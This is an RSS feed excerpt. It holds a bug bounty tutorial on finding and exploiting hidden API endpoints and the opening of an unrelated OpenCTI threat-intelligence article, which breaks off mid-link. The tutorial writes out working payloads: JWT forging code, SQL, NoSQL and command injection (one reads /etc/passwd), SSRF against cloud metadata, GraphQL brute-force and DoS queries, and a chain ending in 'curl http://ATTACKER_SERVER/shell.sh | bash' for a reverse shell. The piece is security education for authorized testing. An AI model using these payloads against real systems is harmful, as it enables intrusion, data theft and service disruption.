<content:encoded><![CDATA[<p>API security testing is the crown jewel of modern bug bounty hunting. While front-end vulnerabilities still exist, APIs are where the real treasure lies — sensitive data, privileged operations, and business logic flaws. This writeup covers the complete lifecycle of discovering, analyzing, and exploiting hidden API endpoints for bug bounty and authorized penetration testing.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DEt2mha_sAbLIoOsiNBDxA.png"><figcaption>Hidden API Endpoints</figcaption></figure><h3>Phase 1: Surface Reconnaissance — Finding the Attack Surface</h3><h3>1.1 Passive Reconnaissance</h3><p>Before sending a single request, build a map of the target’s API surface using passive techniques.</p><p><strong>Wayback Machine &amp; Archive Analysis</strong></p><pre># Using gau (GetAllUrls) — passive URL gathering<br>gau --subs target.com | grep -E "\.json|\.xml|/api/|/v[0-9]/|/graphql|/rest/|/swagger|/docs" &gt; api_endpoints.txt<br><br># Waybackurls via waymore<br>waymore -i target.com -mode U -o U | grep -i api</pre><p><strong>Google Dorking for Exposed APIs</strong></p><pre>site:target.com inurl:"/api/"<br>site:target.com inurl:"/v1/" | inurl:"/v2/" | inurl:"/v3/"<br>site:target.com intitle:"Swagger UI" | intitle:"API Documentation"<br>site:target.com intitle:"index of" "api"<br>site:target.com ext:json "swagger" | ext:yaml "openapi"<br>site:target.com "api_key" | "api-key" | "apikey" filetype:txt</pre><p><strong>Certificate Transparency Logs</strong></p><pre># crt.sh — find subdomains with API-related names<br>curl -s "https://crt.sh/?q=%25.target.com&amp;output=json" | jq -r '.[].name_value' | sort -u | grep -iE "api|dev|staging|internal|gateway|admin"</pre><p><strong>Mobile App Reverse Engineering</strong></p><p>Decompile the mobile APK/IPA to extract embedded API endpoints:</p><pre># Android<br>apktool d app.apk -o decompiled<br>grep -r "https\?://" decompiled/ --include="*.smali" --include="*.xml" | grep -i api<br><br># iOS (via objection)<br>objection --gadget "com.target.app" explore<br>android hooking list classes | grep -i "api\|network\|request"</pre><h3>1.2 Active Reconnaissance</h3><p>Subdomain Enumeration Focused on API Subdomains</p><pre># Subfinder + httpx<br>subfinder -d target.com -all -silent | httpx -silent -ports 80,443,8080,8443,9090,3000,5000 | tee live_subdomains.txt<br><br># Filter for API-related subdomains<br>cat live_subdomains.txt | grep -iE "api|gateway|backend|internal|admin|dev|staging|uat|sandbox|edge|cdn"</pre><p><strong>Directory/Endpoint Bruteforcing</strong></p><p>Use specialized wordlists for API endpoints:</p><pre># Common API paths<br>ffuf -u https://api.target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common-api-endpoints.txt -mc all -fs 0 -fc 404<br><br># GraphQL discovery<br>ffuf -u https://api.target.com/FUZZ -w &lt;(echo -e "graphql\ngraph\ngraphiql\nv1/graphql\nv2/graphql\napi/graphql\nquery\nmutations") -mc 200,301,302,403<br><br># Swagger/OpenAPI docs<br>ffuf -u https://api.target.com/FUZZ -w &lt;(echo -e "swagger.json\nswagger.yaml\napi-docs\nopenapi.json\nopenapi.yaml\ndocs\nv2/swagger.json\nv3/api-docs")</pre><p><strong>Parameter Discovery</strong></p><p>Hidden parameters can unlock undocumented functionality:</p><pre># Arjun — parameter discovery<br>arjun -u https://api.target.com/v1/users --get<br><br># Paramspider<br>paramspider -d target.com --subs --exclude woff,css,js,png,svg,jpg</pre><h3>Phase 2: API Fingerprinting &amp; Documentation Extraction</h3><h3>2.1 Identify API Type &amp; Protocol</h3><p>Send probe requests to identify the API technology:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/735/1*f3eYKwXZd0A_I2cYYEw0xA.png"><figcaption>Identify API Type &amp; Protocol</figcaption></figure><h3>2.2 Extract Full API Documentation</h3><p><strong>Swagger/OpenAPI Endpoints</strong></p><p>Common paths to check:</p><pre>/api/swagger.json<br>/api/swagger.yaml<br>/api/v1/swagger.json<br>/api/v2/swagger.json<br>/swagger-resources<br>/swagger-ui.html<br>/api-docs<br>/v2/api-docs<br>/v3/api-docs<br>/openapi.json<br>/docs<br>/redoc</pre><p>Once found, parse it:</p><pre># Download and parse<br>curl -s https://api.target.com/swagger.json | jq '.paths' | head -100<br><br># Convert to Postman collection for testing<br>curl -s https://api.target.com/swagger.json | npx swagger-to-postman &gt; collection.json</pre><p><strong>GraphQL Introspection</strong></p><p>If GraphQL is detected, attempt introspection:</p><pre># Standard introspection query<br>query {<br>  __schema {<br>    types {<br>      name<br>      fields {<br>        name<br>        type {<br>          name<br>          kind<br>        }<br>      }<br>    }<br>    queryType {<br>      fields {<br>        name<br>        args {<br>          name<br>          type {<br>            name<br>          }<br>        }<br>      }<br>    }<br>    mutationType {<br>      fields {<br>        name<br>        args {<br>          name<br>          type {<br>            name<br>          }<br>        }<br>      }<br>    }<br>  }<br>}</pre><pre># Using InQL (Burp extension or standalone)<br>python3 inql -t https://api.target.com/graphql -d<br><br># Using graphw00f for fingerprinting<br>graphw00f -d https://api.target.com/graphql</pre><h3>2.3 HTTP Method Fuzzing</h3><p>Discover hidden endpoints by fuzzing HTTP methods on known endpoints:</p><pre># Fuzz all methods on discovered endpoints<br>for method in GET POST PUT PATCH DELETE OPTIONS HEAD TRACE CONNECT; do<br>  curl -X $method -s -o /dev/null -w "%{http_code}" https://api.target.com/v1/users<br>  echo " - $method"<br>done</pre><p><strong>Automated with ffuf:</strong></p><pre>ffuf -u https://api.target.com/v1/users \<br>  -X FUZZ \<br>  -w &lt;(echo -e "GET\nPOST\nPUT\nPATCH\nDELETE\nOPTIONS") \<br>  -mc all -fc 404,405,400</pre><h3>Phase 3: Authentication &amp; Authorization Bypass Techniques</h3><h3>3.1 Authentication Bypass Vectors</h3><p>Missing or Weak Auth on Hidden Endpoints</p><p>Hidden endpoints often lack proper authentication:</p><pre># Compare authenticated vs unauthenticated access<br>curl -s https://api.target.com/v1/admin/users -H "Authorization: Bearer $TOKEN"<br>curl -s https://api.target.com/v1/admin/users  # No token — what happens?</pre><p><strong>JWK Injection &amp; JWT Manipulation</strong></p><pre>#!/usr/bin/env python3<br>"""<br>JWT manipulation toolkit for API testing<br>"""<br>import jwt<br>import requests<br>import json<br><br># Technique 1: Set algorithm to 'none'<br>def jwt_none_bypass(token, payload):<br>    """Set alg to 'none' — works on poorly validated JWTs"""<br>    header = {"alg": "none", "typ": "JWT"}<br>    # Some implementations accept 'None' (capital N)<br>    # Try: none, None, NONE, nOnE<br>    forged = jwt.encode(payload, "", algorithm="none")<br>    return forged<br><br># Technique 2: RS256 → HS256 confusion<br>def jwt_alg_confusion(public_key_path, payload):<br>    """<br>    If the server uses RS256 but accepts HS256,<br>    sign with the PUBLIC key (which is known) as HMAC secret<br>    """<br>    with open(public_key_path, "r") as f:<br>        public_key = f.read()<br>    forged = jwt.encode(payload, public_key, algorithm="HS256")<br>    return forged<br><br># Technique 3: JWK injection (CVE-2018-0114)<br>def jwk_injection(payload, private_key):<br>    """<br>    Craft a JWT that includes a malicious JWK in the header.<br>    If the server trusts the embedded JWK, it validates against YOUR key.<br>    """<br>    # Use python-jwt toolkit or jwk-inject.py<br>    # Header: {"alg": "RS256", "jwk": {"kty": "RSA", "n": "...", "e": "AQAB"}}<br>    pass<br><br># Technique 4: Kid injection (directory traversal)<br>def kid_injection(payload):<br>    """<br>    kid: "../../dev/null" means empty signature validation<br>    kid: "/proc/sys/kernel/random/uuid" for DoS testing<br>    """<br>    header = {<br>        "alg": "HS256",<br>        "typ": "JWT",<br>        "kid": "../../dev/null"<br>    }<br>    forged = jwt.encode(payload, "", algorithm="HS256", headers=header)<br>    return forged</pre><p><strong>API Key Leakage via Referer/Origin</strong></p><pre># Check if API keys leak in referer headers<br>curl -s https://api.target.com/v1/endpoint \<br>  -H "Referer: https://api.target.com/v1/users?api_key=test123"</pre><h3>3.2 Authorization Testing — IDOR &amp; BOLA</h3><p>Insecure Direct Object Reference (IDOR) / Broken Object Level Authorization (BOLA)</p><pre># Sequential ID enumeration<br>for id in $(seq 1 100); do<br>  curl -s "https://api.target.com/v1/users/$id" | jq '.email'<br>done<br><br># UUID enumeration (less likely but test)<br>ffuf -u https://api.target.com/v1/orders/FUZZ \<br>  -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -mc 200,403,401<br><br># Mass IDOR via parameter pollution<br>curl -s "https://api.target.com/v1/invoices?id=1&amp;id=2&amp;id=3"<br>curl -s "https://api.target.com/v1/invoices?id[]=1&amp;id[]=2&amp;id[]=3"</pre><p>Mass Assignment</p><pre># Test for mass assignment on POST/PUT endpoints<br>curl -X PUT https://api.target.com/v1/users/me \<br>  -H "Content-Type: application/json" \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -d '{<br>    "name": "test",<br>    "role": "admin",<br>    "is_admin": true,<br>    "balance": 999999999,<br>    "email_verified": true,<br>    "account_status": "active"<br>  }'</pre><p><strong>Broken Function Level Authorization (BFLA)</strong></p><p>Vertical privilege escalation — lower privilege user accessing admin functions:</p><pre># Replace user role token and test admin endpoints<br>curl -s https://api.target.com/v1/admin/users \<br>  -H "Authorization: Bearer $(cat low_priv_token.txt)"</pre><h3>Phase 4: Injection Attacks on APIs</h3><h3>4.1 SQL Injection in API Parameters</h3><p>APIs are just as vulnerable to SQLi as web apps, sometimes more so because of serialization handling:</p><pre># Classic SQLi in API<br>curl -s "https://api.target.com/v1/users?id=1' OR '1'='1"<br>curl -s "https://api.target.com/v1/users?id=1 UNION SELECT @@version"<br><br># JSON-based SQLi<br>curl -X POST https://api.target.com/v1/search \<br>  -H "Content-Type: application/json" \<br>  -d '{"query": "test' OR '1'='1"}'<br><br># NoSQL Injection (MongoDB)<br>curl -X POST https://api.target.com/v1/login \<br>  -H "Content-Type: application/json" \<br>  -d '{"username": "admin", "password": {"$ne": ""}}'</pre><h3>4.2 Command Injection</h3><pre># Command injection in API parameters<br>curl -s "https://api.target.com/v1/utils/ping?host=127.0.0.1;id"<br>curl -s "https://api.target.com/v1/exports?format=csv;cat /etc/passwd"<br><br># Blind command injection with out-of-band detection<br>curl -s "https://api.target.com/v1/convert?file=/tmp/test|curl http://COLLABORATOR.net/$(whoami)"</pre><h3>4.3 SSRF (Server-Side Request Forgery)</h3><p>APIs that fetch external URLs are goldmines for SSRF:</p><pre># Basic SSRF<br>curl -s "https://api.target.com/v1/proxy?url=http://169.254.169.254/latest/meta-data/"<br>curl -s "https://api.target.com/v1/avatar?url=http://127.0.0.1:8080/admin"<br><br># Blind SSRF via Collaborator<br>curl -s "https://api.target.com/v1/webhook?url=http://COLLABORATOR.net/test"<br><br># SSRF via cloud metadata endpoints<br>curl -s "https://api.target.com/v1/import?url=http://169.254.169.254/"  # AWS<br>curl -s "https://api.target.com/v1/import?url=http://metadata.google.internal/"  # GCP<br>curl -s "https://api.target.com/v1/import?url=http://100.100.100.200/latest/meta-data/"  # Alibaba</pre><h3>Phase 5: GraphQL-Specific Attacks</h3><h4>5.1 Introspection &amp; Schema Extraction</h4><pre># InQL scanner<br>inql -t https://api.target.com/graphql -d<br><br># Clairvoyance — introspection even when blocked<br>clairvoyance https://api.target.com/graphql -o schema.json</pre><h3>5.2 Batching &amp; Rate Limit Bypass</h3><pre># Batch login bruteforce — single request, many passwords<br>[<br>  {"query": "mutation { login(username: \"admin\", password: \"password1\") { token } }"},<br>  {"query": "mutation { login(username: \"admin\", password: \"password2\") { token } }"},<br>  {"query": "mutation { login(username: \"admin\", password: \"password3\") { token } }"},<br>  # ... 100+ more<br>]</pre><h3>5.3 Deep Query &amp; Nested Abuse</h3><pre># Circular query — cause DoS via deep nesting<br>query {<br>  user(id: 1) {<br>    posts {<br>      comments {<br>        user {<br>          posts {<br>            comments {<br>              user {<br>                posts {<br>                  comments {<br>                    user { name }<br>                  }<br>                }<br>              }<br>            }<br>          }<br>        }<br>      }<br>    }<br>  }<br>}</pre><h3>5.4 Field Duplication &amp; Resource Exhaustion</h3><pre>query {<br>  __typename<br>  __typename<br>  __typename<br>  __typename<br>  user(id: 1) {<br>    name<br>    name<br>    name<br>    email<br>    email<br>    email<br>    email<br>  }<br>}</pre><h3>Phase 6: Rate Limit Testing &amp; Business Logic Abuse</h3><h4>6.1 Rate Limit Bypass Techniques</h4><pre># Technique 1: Header manipulation<br>curl -s https://api.target.com/v1/forgot-password \<br>  -H "X-Forwarded-For: 127.0.0.1" \<br>  -H "X-Real-IP: 127.0.0.1" \<br>  -H "X-Originating-IP: 127.0.0.1" \<br>  -H "X-Remote-IP: 127.0.0.1" \<br>  -H "X-Client-IP: 127.0.0.1" \<br>  -H "Forwarded: for=127.0.0.1"<br><br># Technique 2: Method alternation<br># If POST is rate-limited, try PATCH or PUT<br>curl -X PATCH https://api.target.com/v1/forgot-password \<br>  -d '{"email":"victim@test.com"}'<br><br># Technique 3: Parameter pollution<br>curl -s "https://api.target.com/v1/forgot-password?email=test@test.com&amp;email=admin@admin.com"</pre><h3>6.2 Business Logic Flaws</h3><p>Race Conditions / TOCTOU</p><pre>#!/usr/bin/env python3<br>"""<br>Race condition testing — concurrent coupon redemption<br>"""<br>import requests<br>import threading<br><br>def redeem_coupon():<br>    r = requests.post("https://api.target.com/v1/coupons/redeem",<br>        json={"code": "ONETIME50"},<br>        headers={"Authorization": f"Bearer {TOKEN}"})<br>    print(f"Status: {r.status_code}, Response: {r.text}")<br><br># Fire 20 simultaneous requests<br>threads = [threading.Thread(target=redeem_coupon) for _ in range(20)]<br>for t in threads: t.start()<br>for t in threads: t.join()</pre><p><strong>Integer Overflow / Underflow</strong></p><pre># Negative numbers<br>curl -X POST https://api.target.com/v1/cart/add \<br>  -H "Content-Type: application/json" \<br>  -d '{"product_id": 1, "quantity": -100}'<br><br># Large numbers causing overflow<br>curl -X POST https://api.target.com/v1/transfer \<br>  -d '{"amount": 99999999999999999999, "to": "attacker"}'</pre><h3>Phase 7: Automation — Build Your API Recon Pipeline</h3><pre>#!/bin/bash<br># api-recon-pipeline.sh — full automated API recon<br># Usage: ./api-recon-pipeline.sh target.com<br><br>TARGET=$1<br>OUTDIR="api_recon_$TARGET"<br>mkdir -p $OUTDIR<br><br>echo "[*] Passive URL collection"<br>gau --subs $TARGET | tee $OUTDIR/gau_urls.txt<br>waybackurls $TARGET | tee -a $OUTDIR/wayback_urls.txt<br><br>echo "[*] Extract API endpoints"<br>cat $OUTDIR/*.txt | grep -iE "api|rest|graphql|swagger|v[0-9]" | sort -u &gt; $OUTDIR/api_endpoints.txt<br><br>echo "[*] Subdomain enumeration"<br>subfinder -d $TARGET -all -silent | httpx -silent -ports 80,443,8080,8443,3000,9090 &gt; $OUTDIR/live_subs.txt<br><br>echo "[*] Swagger/OpenAPI discovery"<br>ffuf -u https://FUZZ/$TARGET/swagger.json -w $OUTDIR/live_subs.txt -mc 200 -o $OUTDIR/swagger_found.json<br><br>echo "[*] Directory fuzzing on API endpoints"<br>while read endpoint; do<br>  ffuf -u $endpoint/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api-endpoints.txt -mc all -fc 404 -o $OUTDIR/ffuf_$(echo $endpoint | md5sum | cut -d' ' -f1).json<br>done &lt; $OUTDIR/api_endpoints.txt<br><br>echo "[*] Parameter fuzzing"<br>arjun -i $OUTDIR/api_endpoints.txt -o $OUTDIR/arjun_params.json<br><br>echo "[*] Done. Review files in $OUTDIR/"</pre><h3>Phase 8: Exploit Chaining — From Recon to Critical Finding</h3><h4>Chain Example: Blind SSRF → Internal Service Discovery → RCE</h4><p>Step 1: Find an endpoint that fetches URLs</p><pre># Avatar upload/profile image endpoint<br>curl -s "https://api.target.com/v1/profile/avatar?url=http://example.com/test.jpg"</pre><p>Step 2: Test for SSRF</p><pre>curl -s "https://api.target.com/v1/profile/avatar?url=http://127.0.0.1:8080/"<br># Response contains internal HTML → SSRF confirmed</pre><p>Step 3: Port scan internal network via SSRF</p><pre>for port in 80 443 3000 5000 6379 8080 8443 9200 27017; do<br>  status=$(curl -s -o /dev/null -w "%{http_code}" \<br>    "https://api.target.com/v1/profile/avatar?url=http://127.0.0.1:$port/")<br>  echo "Port $port: $status"<br>done</pre><p>Step 4: Discover internal admin panel</p><pre>curl -s "https://api.target.com/v1/profile/avatar?url=http://internal-admin.target.internal:8080/deploy?cmd=ls"<br># Returns directory listing of deployment server</pre><p>Step 5: Exploit for RCE</p><pre>curl -s "https://api.target.com/v1/profile/avatar?url=http://internal-admin.target.internal:8080/deploy?cmd=curl+http://ATTACKER_SERVER/shell.sh+|+bash"<br># Reverse shell established</pre><h3>Reporting &amp; Documentation Template</h3><pre># Vulnerability: [Title]<br><br>**Severity:** Critical / High / Medium / Low  <br>**CVSS Score:** X.X (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)  <br>**Endpoint:** `POST /api/v1/users/forgot-password`<br><br>## Description<br>[Clear description of the vulnerability and its impact]<br><br>## Steps to Reproduce<br>1. [Step 1]<br>2. [Step 2]<br>3. [Step 3]<br><br>## Proof of Concept<br>```bash<br># Exact curl command or script<br>curl -X POST https://api.target.com/v1/endpoint \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -d '{"payload": "test"}'</pre><h3>Impact</h3><p>[What can an attacker achieve? Data exposure? Account takeover? RCE?]</p><h3>Remediation</h3><ol><li>[Fix 1 — e.g., Implement proper authorization checks]</li><li>[Fix 2 — e.g., Validate and sanitize all user input]</li><li>[Fix 3 — e.g., Rate-limit sensitive endpoints]</li></ol><h3>References</h3><ul><li>OWASP API Security Top 10: API1:2023 — Broken Object Level Authorization</li><li>CWE-284: Improper Access Control</li></ul><h3>OWASP API Security Top 10 (2023) Quick Reference</h3><pre><br><br>| API# | Category | What to Test |<br>|---|---|---|<br>| API1:2023 | Broken Object Level Authorization | IDOR on any object reference |<br>| API2:2023 | Broken Authentication | JWT bypass, rate limits, password reset |<br>| API3:2023 | Broken Object Property Level Mapping | Mass assignment, extra fields |<br>| API4:2023 | Unrestricted Resource Consumption | DoS via deep pagination, batch queries |<br>| API5:2023 | Broken Function Level Authorization | Vertical privilege escalation |<br>| API6:2023 | Unrestricted Access to Sensitive Business Flows | Automated abuse (coupons, votes) |<br>| API7:2023 | Server Side Request Forgery | URL fetching endpoints |<br>| API8:2023 | Security Misconfiguration | CORS, error handling, default creds |<br>| API9:2023 | Improper Inventory Management | Old versions, staging endpoints |<br>| API10:2023 | Unsafe Consumption of APIs | API-to-API trust issues |<br><br>---<br><br>## Essential Tools Cheatsheet<br><br>| Tool | Purpose | Install |<br>|---|---|---|<br>| **gau** | Passive URL collection | `go install github.com/lc/gau/v2/cmd/gau@latest` |<br>| **httpx** | HTTP probing | `go install github.com/projectdiscovery/httpx/cmd/httpx@latest` |<br>| **ffuf** | Directory/parameter fuzzing | `go install github.com/ffuf/ffuf@latest` |<br>| **arjun** | Parameter discovery | `pip install arjun` |<br>| **inql** | GraphQL analysis (Burp) | BApp Store or `pip install inql` |<br>| **graphw00f** | GraphQL fingerprinting | `git clone https://github.com/dolevf/graphw00f` |<br>| **jwt_tool** | JWT manipulation | `pip install pyjwt jtool` |<br>| **waymore** | Wayback Machine scraper | `pip install waymore` |<br>| **subfinder** | Subdomain discovery | `go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest` |<br>| **nuclei** | Template-based scanning | `go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest` |<br><br>---<br><br>## Final Words<br><br>The key to winning at API bug bounty hunting is **systematic methodology** combined with **creative thinking**. Automated tools will find the low-hanging fruit, but the critical findings come from understanding the application's business logic and chaining seemingly innocuous issues together.<br><br>Remember:<br>- **Every undocumented endpoint is a potential bypass**<br>- **If it's not in the documentation, test it harder**<br>- **Authentication bypass on one endpoint means trying it on every endpoint**<br>- **Business logic &gt; technical complexity** for the highest bounties<br><br>Happy hunting. Stay authorized, stay methodical, and dig deeper than everyone else.</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/627/0*e8oUgphijh5YDW-O.png"><figcaption>Follow US</figcaption></figure><p><em>GitHub: </em><a href="https://github.com/SecurityTalent"><em>SecurityTalent</em></a><em> | Medium: </em><a href="https://medium.com/@securitytalent"><em>Security Talent</em></a><em> | Twitter: </em><a href="https://twitter.com/Securi3yTalent"><em>Securi3yTalent</em></a><em> </em>| Facebook: <a href="https://www.facebook.com/Securi3ytalent/">Securi3ytalent</a> | Telegram: <a href="https://t.me/Securi3yTalent">Securi3yTalent</a></p><p>#CyberSecurity #BugBounty #APISecurity #EthicalHacking #WebSecurity #InfoSec #BugBountyHunter #OWASP #PenTesting #APIHacking</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9cc1d14b8c96" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/mastery-hunt-hidden-api-endpoints-a-deep-dive-into-api-bug-bounty-recon-exploitation-9cc1d14b8c96">Mastery Hunt: Hidden API Endpoints — A Deep Dive into API Bug Bounty Recon &amp; Exploitation</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Intelligent Shield. OpenCTI]]></title>
<description><![CDATA[Beyond Ingestion Subtitle: Deploying AI-Driven Enrichment in OpenCTITransforming Threat Data into High-Confidence IntelligenceIn an era of relentless and complex cyber attacks, traditional, manual threat intelligence cannot keep pace. Security teams are overwhelmed by data fragmentation and the c...]]></description>
<link>https://tsecurity.de/de/3600900/hacking/the-intelligent-shield-opencti/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600900/hacking/the-intelligent-shield-opencti/</guid>
<pubDate>Tue, 16 Jun 2026 09:09:15 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Beyond Ingestion <strong>Subtitle:</strong> Deploying AI-Driven Enrichment in OpenCTI</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yZJrYF0KW4x5gzDg6xNN6A.png"></figure><h3>Transforming Threat Data into High-Confidence Intelligence</h3><p>In an era of relentless and complex cyber attacks, traditional, manual threat intelligence cannot keep pace. Security teams are overwhelmed by data fragmentation and the critical lack of context. “The Intelligent Shield” introduces a new paradigm: beyond simply ingesting data, it’s about deploying advanced, automated machine learning pipelines for <strong>AI-driven enrichment.</strong></p><p>This guide demonstrates how to integrate state-of-the-art Large Language Models (LLMs), such as <strong>Claude AI</strong>, into an <strong>OpenCTI</strong> ecosystem. By leveraging the <strong>OpenCTI STIX 2.1 Knowledge Graph</strong> and natural language processing, this architecture converts disparate, unstructured data feeds into high-fidelity, actionable intelligence. It automatically builds context, executes deep mapping to frameworks like the <strong>MITRE ATT&amp;CK Matrix</strong>, and generates calculated, real-time <strong>Confidence Scores</strong>, enabling organizations to proactively strengthen their defenses with an intuitive, automated <strong>Intelligent Shield.</strong></p><h3>Table of Contents</h3><ol><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#6e45"><strong>What is OpenCTI?</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#8ff6"><strong>Core Capabilities</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7dc1"><strong>Architecture Overview</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7865"><strong>Threat Intelligence Feeds</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#fe8e"><strong>AI Integration Layer</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#c6df"><strong>Prerequisites</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7c94"><strong>Docker Compose Deployment</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#b276"><strong>Connector Configuration</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#a2bd"><strong>AI-Driven Enrichment Pipeline</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#99be"><strong>Post-Deployment Hardening</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#fd26"><strong>Operational Runbook</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#aabb"><strong>Troubleshooting</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7e3e"><strong>Usage Examples</strong></a></li></ol><h3>1. What is OpenCTI?</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fSYjMAN2q5yyUccU6F6daQ.png"></figure><p><strong>OpenCTI</strong> (Open Cyber Threat Intelligence) is an open-source platform developed by Filigran (formerly a project of ANSSI, the French national cybersecurity agency) for structuring, storing, organizing, visualizing, and sharing cyber threat intelligence (CTI).</p><p>It implements the <strong>STIX 2.1</strong> (Structured Threat Information eXpression) standard as its native data model and exposes a <strong>GraphQL API</strong> for all read/write operations. Every object — threat actors, campaigns, malware, vulnerabilities, indicators, attack patterns — is stored as a STIX Domain Object (SDO) or STIX Relationship Object (SRO) backed by two databases:</p><ul><li><strong>ElasticSearch / OpenSearch</strong> — full-text search and analytics</li><li><strong>Apache Cassandra (via JanusGraph)</strong> — graph relationship storage</li></ul><h3>Why OpenCTI?</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1a3jOT66dfRuy3XvkQJ5NQ.png"></figure><h3>2. Core Capabilities</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uj2dA3oWyo03XyrbjkNrGg.png"></figure><h4>2.1 Knowledge Graph</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YvoudJ_c2ItEwEgTZ8TGaQ.png"></figure><ul><li>Entities: Threat Actors, Intrusion Sets, Campaigns, Malware, Tools, Vulnerabilities (CVE), Attack Patterns (MITRE ATT&amp;CK), Courses of Action, Sectors, Countries, Organizations</li><li>Relationships modelled as first-class STIX SROs with confidence scores, date ranges, and TLP markings</li><li>Diamond Model and Kill Chain views built in</li></ul><h4>2.2 Indicator Management</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pGfNRDKffBczwNJeMydW8w.png"></figure><ul><li>IOC lifecycle: valid_from / valid_until with automatic expiry</li><li>Detection rule generation (Sigma, YARA, Snort)</li><li>Bulk import via STIX, CSV, OpenIOC, MISP formats</li><li>Scoring and confidence weighting per source</li></ul><h4>2.3 MITRE ATT&amp;CK Navigator Integration</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_jOEvP3job4uFFPBnXLIkA.png"></figure><ul><li>Full ATT&amp;CK Enterprise / Mobile / ICS matrices</li><li>Heatmaps of technique usage per threat actor or campaign</li><li>Gap analysis against your current detection coverage</li></ul><h4>2.4 Threat Actor Profiling</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*N98FeMPaxF2ZYnhLF8kEGQ.png"></figure><ul><li>Attributed aliases, motivations (financial, espionage, hacktivism)</li><li>Geo and sector targeting mapped on world map</li><li>Timeline of campaigns and malware usage</li></ul><h4>2.5 Automation &amp; Playbooks</h4><ul><li>Built-in playbook engine (since v5.9): trigger enrichment, notifications, or SOAR actions on entity creation/modification(<strong>Enterprise Edition only)</strong></li><li>Python SDK for custom automation</li><li>Webhook support for external integrations</li></ul><h4>2.6 Collaboration &amp; Sharing</h4><ul><li>Role-based access control (RBAC) with groups and organizations</li><li>TLP (Traffic Light Protocol) enforcement at object level</li><li>TAXII 2.1 server — push feeds to SIEMs, firewalls, EDR platforms</li><li>Sharing with partner organizations via federated instances</li></ul><h4>2.7 Dashboard &amp; Reporting</h4><ul><li>Customizable dashboards with widget library</li><li>PDF report generation</li><li>Timeline, matrix, and entity views</li><li>Attack path visualization</li></ul><h3>3. Architecture Overview</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xAFxmmcNnaHdD8ZDbXIbDw.png"></figure><h3>4. Threat Intelligence Feeds</h3><h4>4.1 Free / Open-Source Feeds</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zamxLo7VEhjGX0cOnZvRJQ.png"></figure><ul><li><a href="https://attack.mitre.org/?utm_source=chatgpt.com"><strong>MITRE ATT&amp;CK</strong></a> — Connector: opencti/connector-mitre — Data: Techniques, mitigations, groups, software — Setup: API key not needed.</li><li><a href="https://nvd.nist.gov/?utm_source=chatgpt.com"><strong>CVE / NVD</strong></a> — Connector: opencti/connector-cve — Data: Vulnerabilities — Setup: <a href="https://nvd.nist.gov/developers/request-an-api-key">NVD API key</a> recommended/required depending on configuration.</li><li><a href="https://otx.alienvault.com/?utm_source=chatgpt.com"><strong>AlienVault OTX</strong></a> — Connector: opencti/connector-alienvault — Data: IOCs, pulses, malware families — Setup: Free OTX account/API key.</li><li><a href="https://bazaar.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch MalwareBazaar</strong></a> — Connector: opencti/connector-malwarebazaar — Data: Malware hashes, malware metadata, file observables — Setup: Free MalwareBazaar API key.</li><li><a href="https://urlhaus.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch URLhaus</strong></a> — Connector: opencti/connector-urlhaus — Data: Malicious URLs — Setup: Public feed; no API key for CSV feed.</li><li><a href="https://feodotracker.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch Feodo Tracker</strong></a> — Connector: use <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> or ingest the Feodo CSV/blocklist feed manually — Data: Botnet C2 IPs — Setup: Free.</li><li><a href="https://internetdb.shodan.io/"><strong>Shodan InternetDB</strong></a> — Connector: opencti/connector-shodan-internetdb — Data: IP enrichment, domains, CPEs, CVEs, tags — Setup: No API key required.</li><li><a 